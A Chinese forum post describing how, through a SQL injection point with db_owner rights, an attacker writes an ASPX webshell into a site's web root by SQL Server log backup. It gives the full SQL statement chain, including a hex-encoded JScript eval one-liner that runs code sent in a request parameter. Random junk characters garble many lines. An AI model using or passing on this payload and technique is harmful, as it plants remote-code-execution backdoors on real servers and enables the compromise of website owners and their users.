最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
- ^0 O/ T, j! I* E8 g+ \但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。7 B) i1 U% r' z
经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。
: K. C, ~7 f, B9 X经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。: x) M( y: J9 O; X- L8 J" C
H9 T8 \3 }: X* C% x
--------------------------------------------------------------
( d# L& w/ }/ j' [* z9 W今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,
6 Q( a' _8 B- m# @9 u/ [自己修改备份语句如下:8 m4 E* ?: y0 P8 S- j# J' v/ F9 {
Drop table cmd;--
. ~/ E/ r; D5 y r! ]alter database db_test set RECOVERY FULL;--
/ m' L+ X* n6 W& v% tcreate table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段
! T D9 u! `! L& \ Vbackup log db_test to disk = 'c:\bak' with init;--' a! h! u4 n V. ]0 j& k; d
insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--
% `: I' _) U' Mdelete from cmd where id>1;--删除id>1的数据- a2 o4 o& r1 M# Q5 D/ c; x# ~. m
backup log db_test to disk = 'e:\webroot\test.aspx';--
9 v- |) g& h! J: \' {Drop table cmd;--- A" p( U4 N' E8 M6 s, n5 G8 G
希望对大家有用。 |